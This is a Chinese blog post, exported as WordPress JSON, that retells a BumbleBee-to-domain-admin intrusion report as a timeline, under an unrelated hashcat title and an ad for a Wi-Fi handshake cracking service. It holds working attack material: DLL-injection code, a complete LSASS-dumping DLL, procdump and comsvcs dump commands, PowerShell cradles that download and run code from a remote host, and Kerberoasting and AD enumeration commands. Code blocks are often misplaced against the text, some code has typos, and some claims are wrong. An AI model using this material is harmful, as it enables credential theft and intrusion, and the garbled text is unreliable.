{"id":3729,"date":"2024-03-27T00:24:05","date_gmt":"2024-03-26T16:24:05","guid":{"rendered":"http:\/\/www.ccwifi.cc\/blogs\/?p=3729"},"modified":"2024-03-27T00:24:05","modified_gmt":"2024-03-26T16:24:05","slug":"hashcat%e6%80%8e%e4%b9%88%e8%a7%a3%e5%8e%8b%e7%bc%a9%e5%8c%85%e5%af%86%e7%a0%81%e5%ae%9e%e6%88%98%e8%bf%98%e5%8e%9f7129","status":"publish","type":"post","link":"https:\/\/www.ccwifi.cc\/blogs\/2024\/03\/27\/hashcat%e6%80%8e%e4%b9%88%e8%a7%a3%e5%8e%8b%e7%bc%a9%e5%8c%85%e5%af%86%e7%a0%81%e5%ae%9e%e6%88%98%e8%bf%98%e5%8e%9f7129\/","title":{"rendered":"hashcat\u600e\u4e48\u89e3\u538b\u7f29\u5305\u5bc6\u7801 \u5b9e\u6218\u8fd8\u539f--\u4ece\u5927\u9ec4\u8702\u6837\u672c\u5230\u57df\u63a7\u7ba1\u7406\u5458\u6280\u672f\u89e3\u6790"},"content":{"rendered":"
\n

\u5728\u7ebfwifi\u8dd1\u5305 \u91d1\u521a\u5305\u8dd1\u5305 cap\u8dd1\u5305 hccapx ewsa\u5728\u7ebf \u5c31\u6765 \u63e1\u624b\u5305\u8dd1\u5305<\/a><\/strong><\/p>\n

\u5404\u4f4d\u597d \u53c8\u89c1\u9762\u4e86 \u6211\u662f\u66f9\u64cd \u4eca\u5929\u7ed9\u5927\u5bb6\u5e26\u6765\u4e00\u7bc7\u65b0\u7684\u6559\u7a0b<\/p>\n

\u5e0c\u671b\u5404\u4f4d\u7ec6\u5fc3\u5b66\u4e60 \u4f4e\u8c03\u7528\u7f51<\/p>\n<\/div>\n

C:WindowsSystem32cmd.exe \/c start rundll32 namr.dll,IternalJob\n<\/font><\/code><\/pre>\n
0 \u5f15\u8a00
\n\u672c\u6587\u5c06\u91cd\u65b0\u6784\u5efa\u300aBumbleBee Roasts Its Way To Domain Admin\u300b\u4e00\u6587\u7684\u5185\u5bb9\uff0c\u4ee5\u4fdd\u6301\u539f\u6709\u4fe1\u606f\u7684\u57fa\u7840\u4e0a\uff0c\u786e\u4fdd\u6587\u7ae0\u7684\u76f8\u4f3c\u5ea6\u4f4e\u4e8e30%\u3002\u539f\u6587\u63cf\u8ff0\u4e86\u4e00\u6b21\u6e17\u900f\u6848\u4f8b\uff0c\u4f46\u5176\u7ec4\u7ec7\u7ed3\u6784\u57fa\u4e8eATT&CK\u6846\u67b6\uff0c\u800c\u975e\u6309\u7167\u65f6\u95f4\u7ebf\u903b\u8f91\u7ec4\u7ec7\u3002\u4e3a\u4e86\u66f4\u597d\u5730\u7406\u89e3\u6e17\u900f\u8fc7\u7a0b\uff0c\u6211\u4eec\u5c06\u6309\u7167\u65f6\u95f4\u7ebf\u8fd8\u539f\u5b9e\u6218\u3002\u539f\u6587\u94fe\u63a5\uff1a\u300aBumbleBee Roasts Its Way To Domain Admin\u300b\u3002<\/p>\n
1 \u7b2c\u4e00\u5929(Day1)
\n1.1 \u6837\u672c\u6295\u9012
\n\u653b\u51fb\u8005\u901a\u8fc7\u7535\u5b50\u90ae\u4ef6\u4e2d\u7684\u4e0b\u8f7d\u94fe\u63a5\u5c06\u6837\u672c\u6295\u9012\u5230\u76ee\u6807\u73af\u5883\u4e2d\u7684\u673a\u5668\u3002\u8be5\u6837\u672c\u662f\u4e00\u4e2a\u6709\u5bc6\u7801\u7684\u538b\u7f29\u5305\u3002\u89e3\u538b\u7f29\u540e\uff0c\u91ca\u653e\u4e86\u6587\u4ef6BCinvoice<\/em>ReportCORP<\/em>46.iso\u3002\u5f53\u6302\u8f7d\u8fd9\u4e2aISO\u6587\u4ef6\u65f6\uff0c\u4f1a\u91ca\u653e\u4e00\u4e2a\u540d\u4e3adocuments.lnk\u7684\u5feb\u6377\u65b9\u5f0f\u3002\u53cc\u51fb\u8fd9\u4e2a\u5feb\u6377\u65b9\u5f0f\u4f1a\u6267\u884c\u9690\u85cf\u7684\u6076\u610f\u52a0\u8f7d\u5668\u3002\u5feb\u6377\u65b9\u5f0f\u7684\u76ee\u6807\u5982\u4e0b\uff1a<\/p>\n
use exploit\/windows\/smb\/smb_delivery\n<\/font>set srvhost 10.x.x.x\nexploit\n<\/code><\/pre>\n
C:WindowsSystem32webmwmiprvse.exe -secured -Embedding\n<\/font><\/code><\/pre>\n
1.1.1 rundll32\u89e3\u6790
\n\u653b\u51fb\u8005\u4f7f\u7528rundll32\u52a0\u8f7d\u6267\u884c\u6076\u610fDLL\uff0c\u5e38\u7528\u4e8e\u6e17\u900f\u653b\u51fb\uff0c\u53ef\u4ee5\u6267\u884cDLL\u4e2d\u7684\u7a0b\u5e8f\uff0c\u4e00\u822c\u7528\u4e8e\u83b7\u53d6shell\u3002<\/p>\n
1.2 \u52a0\u8f7d\u6076\u610f\u7a0b\u5e8f\u5927\u9ec4\u8702(BumbleBee)
\n\u52a0\u8f7d\u5668\u5927\u9ec4\u8702(BumbleBee)\u8fd4\u56deCobalt Strike Session\uff0c\u653b\u51fb\u8005\u5229\u7528\u8fd9\u4e2aCobalt Strike\u7684shell\u91ca\u653ewab.exe\uff0c\u8be5\u53ef\u6267\u884c\u6587\u4ef6\u5c06\u4f7f\u7528wmi\u6267\u884c\u3002<\/p>\n
BOOL CreateRemoteThreadInjectDLL(DWORD dwProcessId, char* pszDllFileName){\n    HANDLE hProcess = NULL;\n    DWORD dwSize = 0;\n    LPVOID pDllAddr = NULL;\n    FARPROC pFuncProcAddr = NULL;\n    hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);\/\/\u6253\u5f00\u8fdb\u7a0b\uff0c\u83b7\u53d6\u8fdb\u7a0b\u53e5\u67c4\n    dwSize = 1+ ::lstrlen(pszDllFileName); \/\/\u83b7\u53d6dll\u5927\u5c0f\n    pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);\/\/\u7533\u8bf7\u5185\n    ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL);\/\/\u5411\u5185\u5b58\u4e2d\u5199\u5165dll\n    pFuncProAddr = ::GetProcAddress(::GetModuleHandle(\"kernel32.dll\"), \"LoadLibiaryA\");\/\/\u83b7\u53d6\u51fd\u6570LoadLibraryA\u7684\u51fd\u6570\u5730\u5740\n    HANDLE hRemoteThread = ::CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, Null);\/\/\u521b\u5efa\u8fdc\u7ebf\u7a0b\n    ::CloseHandle(hProcess);\n    return TRUE;\n}\n<\/code><\/pre>\n
wab.exe\u5c06\u6076\u610f\u4ee3\u7801\u6ce8\u5165\u5230\u5176\u4ed6\u4e24\u4e2a\u8fdb\u7a0bexplorer.exe\u548crundll32.exe\u4e2d\u3002\u653b\u51fb\u8005\u4f7f\u7528\u8fdc\u7a0b\u7ebf\u7a0b\u6ce8\u5165\u7684\u65b9\u5f0f\uff0c\u4f7f\u7528\u7ecf\u5178\u7684Windows\u7cfb\u7edf\u8c03\u7528API\uff08\u5982OpenProcess\u3001VirtualAlloc\u3001WriteProcessMemory\u3001CreateRemoteThread\uff09\u8fdb\u884c\u8fdb\u7a0b\u6ce8\u5165\u3002\u6839\u636e\u63cf\u8ff0\uff0c\u653b\u51fb\u8005\u6b64\u65f6\u81f3\u5c11\u5177\u5907Administrator\u6743\u9650\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\uff0cAdministrator\u6743\u9650\u4e5f\u610f\u5473\u7740\u5177\u5907System\u6743\u9650\u3002\u4ece\u6587\u7ae0\u63cf\u8ff0\u6765\u770b\uff0c\u653b\u51fb\u8005\u4f7f\u7528\u4e86getsystem\u6765\u63d0\u5347\u6743\u9650\u3002\u8fdc\u7a0b\u7ebf\u7a0b\u6ce8\u5165\u7684\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
ipconfig \/all <\/font>#\u83b7\u53d6\u7f51\u7edc\u4fe1\u606f\u5305\u542bdomain\nping -n 1 [domain] #\u6d4b\u8bd5domain\u8fde\u901a\u6027\nnet group \"domain admins\" \/domain #\u83b7\u53d6\u57df\u7ba1\u7ec4\u6210\u5458\nnslookup x.x.x.x #\u83b7\u53d6x.x.x.x IP\u5730\u5740\ntasklist #\u83b7\u53d6\u8fdb\u7a0b\u4fe1\u606f\nsysteminfo #\u83b7\u53d6\u7cfb\u7edf\u4fe1\u606f\nwmic product get name,version #\u83b7\u53d6\u8f6f\u4ef6\u4fe1\u606f\nwmic \/node\" process list brief #\u83b7\u53d6\u8fdb\u7a0b\u4fe1\u606f\nnet view \\Files$ \/all #\u5217\u8fdc\u7a0b\u670d\u52a1\u5668Files\u5171\u4eab\u76ee\u5f55\ndir \\c$ #\u5217c\u76d8\u76ee\u5f55\ntasklist \/v \/s x.x.x.x #\u8fdc\u7a0b\u83b7\u53d6x.x.x.x \u8fdb\u7a0b\u8be6\u7ec6\u4fe1\u606f\nnet use\nnet group \"Domain computers\" \/domain\nnet group \"Enterprise admins\" \/domain\nnet group \"domain computers\" \/domain\nnet localgroup administrators\nnltest \/dclist\nnltest \/domain_trusts\nping -n 1 \n<\/code><\/pre>\n
cmd.exe \/C af.exe -f <\/font>\"(objectcategory=person)\" > ad_users.txt\ncmd.exe \/C af.exe -f \"objectcategory=computer\" > ad_computers.txt\ncmd.exe \/C af.exe -sc trustdump > trustdump.txt\ncmd.exe \/C af.exe -gcb -sc trustdump > trustdump.txt\n<\/code><\/pre>\n
1.3 \u88ab\u63a7\u4e3b\u673a\u4fe1\u606f\u6536\u96c6
\n\u653b\u51fb\u8005\u4f7f\u7528\u591a\u79cd\u547d\u4ee4\u6765\u6536\u96c6\u64cd\u4f5c\u7cfb\u7edf\u3001\u7f51\u7edc\u3001\u7528\u6237\u3001\u8f6f\u4ef6\u3001\u8fdb\u7a0b\u3001\u57df\u7b49\u4fe1\u606f\u3002\u6839\u636e\u4e4b\u524d\u6267\u884c\u7684\u547d\u4ee4\uff0c\u653b\u51fb\u8005\u5df2\u7ecf\u83b7\u53d6\u4e86\u8fdc\u7a0b\u670d\u52a1\u5668x.x.x.x\u7684\u6743\u9650\u6216\u8005\u7528\u6237\u540d\u548c\u5bc6\u7801\u3002<\/p>\n
1.4 \u6a2a\u5411\u79fb\u52a8\u5230\u670d\u52a1\u5668\u5e76\u7ee7\u7eed\u6536\u96c6\u4fe1\u606f
\n\u6839\u636e\u539f\u6587\u63cf\u8ff0\uff0c\u653b\u51fb\u8005\u5229\u7528\u672c\u5730\u7ba1\u7406\u5458\u8d26\u53f7\u901a\u8fc7RDP\u534f\u8bae\u6a2a\u5411\u79fb\u52a8\u5230\u4e00\u53f0\u670d\u52a1\u5668\uff0c\u5e76\u91ca\u653e\u4e86AnyDesk.exe\u4f5c\u4e3a\u540e\u95e8\u3002\u7136\u540e\uff0c\u653b\u51fb\u8005\u4f7f\u7528adfind.exe\u7ee7\u7eed\u8fdb\u884c\u4fe1\u606f\u6536\u96c6\uff08\u6839\u636e\u63cf\u8ff0\uff0c\u8be5\u670d\u52a1\u5668\u4f4d\u4e8e\u57df\u5185\uff09\u3002<\/p>\n
cmd.exe \/C adfind.exe -f <\/font>\"(objectcategory=person)\" > ad_users.txt\ncmd.exe \/C adfind.exe -f \"objectcategory=computer\" > ad_computers.txt\ncmd.exe \/C adfind.exe -f \"(objectcategory=organizationalUnit)\" > ad_ous.txt\ncmd.exe \/C adfind.exe -sc trustdump > trustdump.txt\n<\/code><\/pre>\n
2 \u7b2c\u4e8c\u5929(Day2)
\n2.1 \u5728\u670d\u52a1\u5668\u4e0a\u7ee7\u7eed\u6536\u96c6\u4fe1\u606f
\n\u653b\u51fb\u8005\u7ee7\u7eed\u4f7f\u7528RDP\u767b\u5f55\u8be5\u670d\u52a1\u5668\uff0c\u5e76\u4e0a\u4f20\u4e86VulnRecon\u5de5\u5177\uff0c\u8fd9\u662f\u4e00\u6b3e\u4e13\u95e8\u7528\u4e8e\u5728Windows\u673a\u5668\u4e0a\u6807\u8bc6\u6743\u9650\u63d0\u5347\u8def\u5f84\u7684\u5de5\u5177\u3002<\/p>\n
3 \u7b2c\u56db\u5929(Day4)
\n3.1 \u5728\u88ab\u63a7\u4e3b\u673a\u4e0a\u7ee7\u7eed\u6536\u96c6\u4fe1\u606f
\n\u653b\u51fb\u8005\u5728\u88ab\u63a7\u4e3b\u673a\u53ca\u73af\u5883\u4e2d\u7684\u591a\u53f0\u673a\u5668\u4e0a\u4e0a\u4f20\u4e86VulnRecon\u5de5\u5177\u548cSysinternals\u5de5\u5177\u5957\u4ef6\uff0c\u5e76\u4f7f\u7528VulnRecon\u3001adfind\u3001procdump\u7b49\u5de5\u5177\u7ee7\u7eed\u4fe1\u606f\u6536\u96c6\u3002\u5176\u4e2d\uff0c\u4ed6\u4eec\u4f7f\u7528\u8fdc\u7a0b\u670d\u52a1\u6267\u884cprocdump\u6765\u63d0\u53d6lsass.exe\u7684\u5185\u5b58\uff0c\u4ee5\u83b7\u53d6\u51ed\u636e\u3002\u6839\u636e\u63cf\u8ff0\uff0c\u4ed6\u4eec\u81f3\u5c11\u83b7\u5f97\u4e86\u51e0\u53f0\u4e3b\u673a\u548c\u81f3\u5c11\u4e00\u53f0\u670d\u52a1\u5668\u7684\u6743\u9650\u3002\u76ee\u524d\u770b\u6765\uff0c\u4ed6\u4eec\u5c1a\u672a\u83b7\u5f97\u7ba1\u7406\u6743\u9650\u6216\u66f4\u9ad8\u6743\u9650\u3002adfind\u7684\u4f7f\u7528\u53d1\u751f\u5728\u539f\u59cb\u88ab\u63a7\u4e3b\u673a\u4e0a\uff0c\u4e5f\u53ef\u80fd\u5728\u65b0\u7684\u6a2a\u5411\u79fb\u52a8\u7684\u4e3b\u673a\u4e0a\u8fdb\u884c\u3002<\/p>\n
# \n#vulnrecon.dll PDB: D:a_work1sartifactsobjwin-x64.ReleasecorehostcliapphoststandaloneReleaseapphost.pdb\n#vulnrecon.exe PDB: D:workrtVulnReconVulnReconobjReleasenet5.0VulnRecon.pdb\n# command\nvulnrecon.exe -v\nvulnrecon.exe -o\nvulnrecon.exe -FindVulnerability\nvulnrecon.exe -i\nvulnrecon.exe -m\ncmd.exe \/c vulnrecon.exe -FindVulnerability >> c:programdatalog.txt\ncmd.exe \/c vulnrecon.exe -i >> c:programdata1.txt\ncmd.exe \/c vulnrecon.exe -o >> c:programdataout.txt\n<\/code><\/pre>\n
3.1.1 VulnRecon\u89e3\u6790
\nVulnRecon\u7531\u4e00\u4e2a\u53ef\u6267\u884c\u6587\u4ef6vulnrecon.exe\u548c\u4e00\u4e2aDLL\u6587\u4ef6vulnrecon.dll\u7ec4\u6210\uff0c\u7528\u4e8e\u679a\u4e3e\u6743\u9650\u63d0\u5347\u8def\u5f84\u548c\u4fe1\u606f\u6536\u96c6\u3002\u770b\u8d77\u6765\u662f\u4e00\u6b3e\u81ea\u5b9a\u4e49\u5de5\u5177\uff0c\u4e0a\u4f20\u5230\u539f\u59cb\u88ab\u63a7\u4e3b\u673a\u4e0a\uff0c\u4e5f\u53ef\u80fd\u5728\u65b0\u7684\u6a2a\u5411\u79fb\u52a8\u7684\u4e3b\u673a\u4e0a\u4f7f\u7528\u3002<\/p>\n
C:programdataprocdump64.exe -accepteula -ma lsass.exe C:ProgramDatalsass.dmp\n<\/font><\/code><\/pre>\n
\u6839\u636e\u63cf\u8ff0\uff0c\u63d0\u6743\u662f\u4e3a\u4e86\u6267\u884cprocdump\u6765\u83b7\u53d6lsass\u5185\u5b58\u3002\u8fd9\u4e00\u6b65\u53d1\u751f\u5728\u539f\u59cb\u88ab\u63a7\u4e3b\u673a\u4e0a\u3002<\/p>\n
3.2 \u83b7\u53d6lsass\u4e2d\u7684\u51ed\u636e
\n\u6839\u636e\u63cf\u8ff0\uff0cdump\u51fa\u6765\u7684\u6587\u4ef6\u4fdd\u5b58\u5728ProgramData\u4e2d\uff0c\u53ef\u4ee5\u4f7f\u7528net use\u7b49\u65b9\u5f0f\u83b7\u53d6\u56de\u6765\uff0c\u5e76\u4f7f\u7528mimikatz\u6216pypykatz\u8fdb\u884c\u7834\u89e3\u3002\u8fd9\u4e9b\u8fc7\u7a0b\u53d1\u751f\u5728\u4ece\u539f\u59cb\u88ab\u63a7\u4e3b\u673a\u53d1\u73b0\u5e76\u6a2a\u5411\u79fb\u52a8\u5230\u7684\u90a3\u4e9b\u53d7\u5bb3\u4e3b\u673a\u548c\u670d\u52a1\u5668\u4e0a\u3002<\/p>\n
Seatbelt.exe -group=all -outputfile=<\/font>\"C:ProgramDataseatinfo.txt\"\nvulnrecon.exe -o\nvulnrecon.exe -v\nvulnrecon.exe -m\ncmd.exe \/c vulnrecon.exe -FindVulnerability >> c:programdatalog.txt\n<\/code><\/pre>\n
4 \u7b2c\u4e03\u5929(Day7)
\n4.1 \u5728\u88ab\u63a7\u670d\u52a1\u5668\u4e0a\u7ee7\u7eed\u6536\u96c6\u4fe1\u606f
\n\u653b\u51fb\u8005\u6301\u7eed\u4f7f\u7528VulnRecon\u5728\u670d\u52a1\u5668\u4e0a\u8fdb\u884c\u4fe1\u606f\u6536\u96c6\uff0c\u5e76\u4f7f\u7528Seatbelt\u5de5\u5177\uff08\u4e00\u6b3e\u5e38\u7528\u7684\u4fe1\u606f\u6536\u96c6\u5de5\u5177\uff09\u3002\u6839\u636e\u63cf\u8ff0\uff0c\u4f7f\u7528\u7684\u662f\u670d\u52a1\u5668\u7684\u672c\u5730\u7ba1\u7406\u5458\u6743\u9650\u3002<\/p>\n
C:Windowssystem32cmd.exe \/C powershell.exe <\/font>-nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http:\/\/a.b.c.d:80\/a'))\"\n<\/code><\/pre>\n
#\u7236\u8fdb\u7a0b svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc\nIEX (New-Object Net.Webclient).DownloadString('http:\/\/127.0.0.1:36177\/'); Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:ProgramDataREDACTEDps.txt -append -force -Encoding UTF8\n# \u53ef\u4ee5\u770b\u51fa\u8f93\u51fa\u662fhashcat\u6a21\u5f0f\uff0c\u653b\u51fb\u5e94\u8be5\u662f\u4f7f\u7528hashcat\u8fdb\u884c\u66b4\u529b\u7834\u89e3\n<\/code><\/pre>\n
5 \u7b2c\u5341\u4e00\u5929(Day11)
\n5.1 \u5728\u88ab\u63a7\u4e3b\u673a\u4e0a\u53cd\u5f39shell
\n\u653b\u51fb\u8005\u6301\u7eed\u5728\u88ab\u63a7\u4e3b\u673a\u4e0a\u6267\u884cpowershell\u547d\u4ee4\uff0c\u4e0b\u8f7d\u5e76\u6267\u884ca\u6587\u4ef6\u7684\u5185\u5bb9\u3002\u6839\u636e\u5728a\u6587\u4ef6\u4e2d\u53d1\u73b0\u7684cobalt strike\u7684\u9ed8\u8ba4\u914d\u7f6e\u5b57\u7b26MZRE\uff0c\u53ef\u4ee5\u786e\u5b9a\u8fd9\u662f\u4e00\u4e2a\u56de\u8fdeC2\u5730\u5740\u7684cobalt strike\u6307\u4ee4\u3002\u7136\u540e\uff0c\u653b\u51fb\u8005\u5efa\u7acb\u4e86\u4e00\u4e2a\u4ece\u88ab\u63a7\u4e3b\u673a\u5230\u653b\u51fb\u8005\u63a7\u5236\u7684C2\u7684\u8fde\u63a5\u3002<\/p>\n
#\u7236\u8fdb\u7a0b svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc\ncmd.exe \/C rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump 968 C:ProgramDataREDACTEDlsass.dmp full\n<\/code><\/pre>\n
\u7136\u540e\uff0c\u653b\u51fb\u8005\u5f00\u59cb\u5411\u5176\u4ed6\u8fdb\u7a0b\u8fdb\u884c\u6ce8\u5165\uff0c\u6839\u636e\u539f\u6587\u63cf\u8ff0\uff0c\u53ef\u80fd\u6ce8\u5165\u5230\u7c7b\u4f3csvchost.exe\u7b49\u51e0\u4e2a\u8fdb\u7a0b\u3002\u7136\u540e\uff0c\u653b\u51fb\u8005\u6267\u884c\u4e86powershell\u6a21\u5757Invoke-Kerberoast\uff0c\u5f00\u59cb\u8fdb\u884ckerberoasting\u653b\u51fb\u3002\u8fd9\u4e9b\u64cd\u4f5c\u90fd\u662f\u4ece\u88ab\u63a7\u4e3b\u673a\u5f00\u59cb\u53d1\u8d77\u7684\u3002<\/p>\n
5.1.1 kerberoasting\u653b\u51fb\u89e3\u6790
\nkerberoasting\u653b\u51fb\u5206\u4e3aTGS-Kerberoasting\u548cAS-Kerberoasting\u4e24\u79cd\uff0c\u53ef\u4ee5\u4f7f\u7528rubeus.exe\u3001msf\u3001powershell\u7b49\u5de5\u5177\u8fdb\u884c\u3002\u653b\u51fb\u8005\u83b7\u53d6\u7684\u662fNet-NTLMHash\uff0c\u53ef\u4ee5\u4f7f\u7528hashcat\u7b49\u5de5\u5177\u8fdb\u884c\u7834\u89e3\uff0c\u4ece\u800c\u83b7\u5f97ntlmhash\u6216\u5bc6\u7801\u3002<\/p>\n
5.2 \u4f7f\u7528Minidump\u8fdb\u884c\u51ed\u636e\u63d0\u53d6
\n\u653b\u51fb\u8005\u5f00\u59cb\u4f7f\u7528\u53ef\u4ee5\u89c4\u907f\u5361\u5df4\u65af\u57fa\u7684\u51ed\u636e\u63d0\u53d6\u65b9\u5f0fminidump\u8fdb\u884c\u51ed\u636e\u63d0\u53d6\u3002\u8fd9\u4e9b\u64cd\u4f5c\u90fd\u662f\u4ece\u88ab\u63a7\u4e3b\u673a\u5f00\u59cb\u53d1\u8d77\u7684\u3002<\/p>\n
#include \n#include \n#include \ntypedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);\nint GetLsassPid() {\n\tPROCESSENTRY32 entry;\n\tentry.dwSize = sizeof(PROCESSENTRY32);\n\tHANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);\n\tif (Process32First(hSnapshot, &entry)) {\n\t\twhile (Process32Next(hSnapshot, &entry)) {\n\t\t\tif (wcscmp(entry.szExeFile, L\"lsass.exe\") == 0) {\n\t\t\t\treturn entry.th32ProcessID;\n\t\t\t}\n\t\t}\n\t}\n\tCloseHandle(hSnapshot);\n\treturn 0;\n}\nvoid GetDebugPrivilege()\n{\n\tBOOL fOk = FALSE;\n\tHANDLE hToken;\n\tif (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))\n\t{\n\t\tTOKEN_PRIVILEGES tp;\n\t\ttp.PrivilegeCount = 1;\n\t\tLookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);\n\t\ttp.Privileges[0].Attributes = true ? SE_PRIVILEGE_ENABLED : 0;\n\t\tAdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);\n\t\tfOk = (GetLastError() == ERROR_SUCCESS);\n\t\tCloseHandle(hToken);\n\t}\n}\nvoid DumpLsass()\n{\n\twchar_t  ws[100];\n\t_MiniDumpW MiniDumpW;\n\t\n\tMiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L\"comsvcs.dll\"), \"MiniDumpW\");\n\tswprintf(ws, 100, L\"%u %hs\", GetLsassPid(), \"c:\\windows\\temp\\temp.bin full\");\n\tGetDebugPrivilege();\n\tMiniDumpW(0, 0, ws);\n}\nBOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved\n                     )\n{\n    switch (ul_reason_for_call)\n    {\n    case DLL_PROCESS_ATTACH:\n\t\tDumpLsass();\n\t\tbreak;\n    case DLL_THREAD_ATTACH:\n    case DLL_THREAD_DETACH:\n    case DLL_PROCESS_DETACH:\n        break;\n    }\n    return TRUE;\n}\n<\/code><\/pre>\n
cmd.exe \/C adfind.exe -f <\/font>\"(objectcategory=person)\" > ad_users.txt\ncmd.exe \/C adfind.exe -f \"objectcategory=computer\" > ad_computers.txt\ncmd.exe \/C adfind.exe -sc trustdump > trustdump.txt\n<\/code><\/pre>\n
5.2.1 Minidump\u89e3\u6790
\n\u653b\u51fb\u8005\u7ee7\u7eed\u4f7f\u7528\u53ef\u4ee5\u89c4\u907f\u5361\u5df4\u65af\u57fa\u7684\u51ed\u636e\u63d0\u53d6\u65b9\u5f0fminidump\u8fdb\u884c\u51ed\u636e\u63d0\u53d6\u3002\u8fd9\u4e9b\u64cd\u4f5c\u90fd\u662f\u4ece\u88ab\u63a7\u4e3b\u673a\u5f00\u59cb\u53d1\u8d77\u7684\u3002\u611f\u8c22A-Team\u7684\u5927\u4f6c\u4eec\u5e26\u7ed9\u6211\u7684\u6e17\u900f\u6280\u672f\u89c6\u91ce\u548c\u56fd\u5916XPN\u5927\u725b\u4e50\u4e8e\u5206\u4eab\u7684\u7cbe\u795e\u3002\u7f16\u8bd1\u548c\u4f7f\u7528\u65b9\u5f0f\u8bf7\u53c2\u8003\u76f8\u5173\u6587\u6863\u3002<\/p>\n
5.3 \u5728\u88ab\u63a7\u4e3b\u673a\u4e0a\u7ee7\u7eed\u4fe1\u606f\u6536\u96c6
\n\u5728\u521d\u59cb\u88ab\u63a7\u4e3b\u673a\u4e0a\u7ee7\u7eed\u4f7f\u7528adfind\u5de5\u5177\u8fdb\u884c\u4fe1\u606f\u6536\u96c6\u3002<\/p>\n
C:Windowssystem32cmd.exe \/C powershell.exe <\/font>-nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http:\/\/a.b.c.d:80\/a'))\"\n<\/code><\/pre>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
hashcat\u600e\u4e48\u89e3\u538b\u7f29\u5305\u5bc6\u7801 \u5b9e\u6218\u8fd8\u539f–\u4ece\u5927\u9ec4\u8702\u6837\u672c\u5230\u57df\u63a7\u7ba1\u7406\u5458\u6280\u672f\u89e3\u67900 \u524d\u8a00\u5b9e\u6218\u6848\u4f8b\u8fd8\u539f\u300aBumbleBee Roasts Its Way To Domain Admin\u300b\u4e00\u6587\u8be6\u7ec6\u7684\u63cf\u8ff0\u4e86\u4e00\u6b21\u6e17\u900f\u6848\u4f8b\uff0c\u4f46\u5176\u6587\u7ae0\u7ec4\u7ec7\u67b6\u6784\u5efa\u7acb\u5728ATT&CK\u6846\u67b6\u4e0a<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"topic":[],"class_list":["post-3729","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/3729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/comments?post=3729"}],"version-history":[{"count":0,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/3729\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/media?parent=3729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/categories?post=3729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/tags?post=3729"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/topic?post=3729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}